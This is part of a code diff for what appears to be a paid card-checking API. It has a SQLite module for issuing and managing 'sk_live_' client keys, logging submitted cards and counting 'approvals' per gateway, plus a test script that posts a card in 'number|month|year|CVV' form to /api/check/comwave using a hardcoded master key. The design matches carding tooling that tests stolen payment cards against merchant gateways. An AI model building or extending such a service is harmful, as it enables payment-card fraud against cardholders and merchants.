api_key TEXT NOT NULL,
gateway TEXT NOT NULL,
card TEXT NOT NULL,
status TEXT NOT NULL,
response_time REAL,
created_at TEXT NOT NULL,
ip_address TEXT
)
""")
await db.execute("""
CREATE TABLE IF NOT EXISTS admin_log (
id INTEGER PRIMARY KEY AUTOINCREMENT,
action TEXT NOT NULL,
target_key TEXT,
details TEXT,
ip_address TEXT,
created_at TEXT NOT NULL
)
""")
await db.execute("CREATE INDEX IF NOT EXISTS idx_log_key ON request_log(api_key)")
await db.execute("CREATE INDEX IF NOT EXISTS idx_log_created ON request_log(created_at)")
await db.commit()
# ── Key Management ──
async def create_key(owner: str, gateways: list | str = "*", request_limit: int | None = None,
expires_days: int | None = None, rate_per_minute: int = 10) -> dict:
key = "sk_live_" + secrets.token_urlsafe(32)
now = _now()
expires_at = None
if expires_days:
expires_at = (datetime.now(timezone.utc) + timedelta(days=expires_days)).isoformat()
gw_json = json.dumps(gateways) if isinstance(gateways, list) else json.dumps(gateways)
async with aiosqlite.connect(DB_PATH) as db:
await db.execute(
"INSERT INTO api_keys (api_key, owner, created_at, expires_at, request_limit, rate_per_minute, allowed_gateways) VALUES (?,?,?,?,?,?,?)",
(key, owner, now, expires_at, request_limit, rate_per_minute, gw_json)
)
await db.commit()
return {"api_key": key, "owner": owner, "created_at": now, "expires_at": expires_at,
"request_limit": request_limit, "requests_used": 0, "rate_per_minute": rate_per_minute,
"allowed_gateways": gateways, "is_active": True, "is_paused": False}
async def get_key(api_key: str) -> dict | None:
async with aiosqlite.connect(DB_PATH) as db:
db.row_factory = aiosqlite.Row
async with db.execute("SELECT * FROM api_keys WHERE api_key = ?", (api_key,)) as cur:
row = await cur.fetchone()
if not row:
return None
d = dict(row)
d["allowed_gateways"] = json.loads(d["allowed_gateways"])
d["is_active"] = bool(d["is_active"])
d["is_paused"] = bool(d["is_paused"])
return d
async def list_keys() -> list[dict]:
async with aiosqlite.connect(DB_PATH) as db:
db.row_factory = aiosqlite.Row
async with db.execute("SELECT * FROM api_keys ORDER BY created_at DESC") as cur:
rows = await cur.fetchall()
result = []
for row in rows:
d = dict(row)
d["allowed_gateways"] = json.loads(d["allowed_gateways"])
d["is_active"] = bool(d["is_active"])
d["is_paused"] = bool(d["is_paused"])
result.append(d)
return result
async def update_key(api_key: str, **fields) -> bool:
allowed = {"owner", "expires_at", "request_limit", "requests_used",
"rate_per_minute", "allowed_gateways", "is_active", "is_paused"}
updates = {k: v for k, v in fields.items() if k in allowed}
if not updates:
return False
if "allowed_gateways" in updates and isinstance(updates["allowed_gateways"], list):
updates["allowed_gateways"] = json.dumps(updates["allowed_gateways"])
elif "allowed_gateways" in updates and isinstance(updates["allowed_gateways"], str):
updates["allowed_gateways"] = json.dumps(updates["allowed_gateways"])
set_clause = ", ".join(f"{k} = ?" for k in updates)
values = list(updates.values()) + [api_key]
async with aiosqlite.connect(DB_PATH) as db:
cur = await db.execute(f"UPDATE api_keys SET {set_clause} WHERE api_key = ?", values)
await db.commit()
return cur.rowcount > 0
async def delete_key(api_key: str) -> bool:
async with aiosqlite.connect(DB_PATH) as db:
cur = await db.execute("DELETE FROM api_keys WHERE api_key = ?", (api_key,))
await db.commit()
return cur.rowcount > 0
async def increment_usage(api_key: str):
async with aiosqlite.connect(DB_PATH) as db:
await db.execute("UPDATE api_keys SET requests_used = requests_used + 1 WHERE api_key = ?", (api_key,))
await db.commit()
# ── Request Logging ──
async def log_request(api_key: str, gateway: str, card: str, status: str,
response_time: float, ip_address: str):
async with aiosqlite.connect(DB_PATH) as db:
await db.execute(
"INSERT INTO request_log (api_key, gateway, card, status, response_time, created_at, ip_address) VALUES (?,?,?,?,?,?,?)",
(api_key, gateway, card, status, response_time, _now(), ip_address)
)
await db.commit()
# ── Admin Logging ──
async def log_admin(action: str, target_key: str | None, details: dict | None, ip_address: str):
async with aiosqlite.connect(DB_PATH) as db:
await db.execute(
"INSERT INTO admin_log (action, target_key, details, ip_address, created_at) VALUES (?,?,?,?,?)",
(action, target_key, json.dumps(details) if details else None, ip_address, _now())
)
await db.commit()
# ── Stats ──
async def get_stats_24h() -> dict:
cutoff = (datetime.now(timezone.utc) - timedelta(hours=24)).isoformat()
async with aiosqlite.connect(DB_PATH) as db:
async with db.execute("SELECT COUNT(*) FROM request_log WHERE created_at > ?", (cutoff,)) as cur:
total = (await cur.fetchone())[0]
async with db.execute("SELECT COUNT(*) FROM request_log WHERE created_at > ? AND status = 'approved'", (cutoff,)) as cur:
approvals = (await cur.fetchone())[0]
async with db.execute("SELECT COUNT(DISTINCT api_key) FROM request_log WHERE created_at > ?", (cutoff,)) as cur:
unique_users = (await cur.fetchone())[0]
return {"total_checks_24h": total, "approvals_24h": approvals, "unique_users_24h": unique_users}

56
test_api.py Normal file
View File

@@ -0,0 +1,56 @@
"""Quick test of all API endpoints."""
import httpx
import json
import time
BASE = "http://localhost:8000"
MASTER = "eJQV7hMfRTo-2j1f2c5po4vq4amD-F4nylHRtGPGkMU"
ADM = {"X-API-Key": MASTER}
def p(label, r):
print(f"\n=== {label} === [{r.status_code}]")
try:
print(json.dumps(r.json(), indent=2))
except Exception:
print(r.text)
# Health
p("HEALTH", httpx.get(f"{BASE}/health"))
# Create key
r = httpx.post(f"{BASE}/admin/keys", headers=ADM, json={
"owner": "test_client", "gateways": ["comwave", "comwave3"],
"request_limit": 100, "rate_per_minute": 10
})
p("CREATE KEY", r)
KEY = r.json()["api_key"]
CLI = {"X-API-Key": KEY}
# List keys
p("LIST KEYS", httpx.get(f"{BASE}/admin/keys", headers=ADM))
# Client usage
p("USAGE", httpx.get(f"{BASE}/api/usage", headers=CLI))
# Client gateways
p("GATEWAYS", httpx.get(f"{BASE}/api/gateways", headers=CLI))
# Client cooldown
p("COOLDOWN", httpx.get(f"{BASE}/api/cooldown", headers=CLI))
# Admin stats
p("STATS", httpx.get(f"{BASE}/admin/stats", headers=ADM))
# Security: bad key
p("BAD KEY", httpx.get(f"{BASE}/api/usage", headers={"X-API-Key": "fake"}))
# Security: no key
p("NO KEY", httpx.get(f"{BASE}/api/usage"))
# Security: wrong gateway
p("WRONG GW", httpx.post(f"{BASE}/api/check/fakegw", headers=CLI, json={"card": "4111111111111111|12|2025|123"}))
# Security: bad card format
p("BAD CARD", httpx.post(f"{BASE}/api/check/comwave", headers=CLI, json={"card": "not-a-card"}))
print("\n=== ALL ENDPOINT TESTS DONE ===")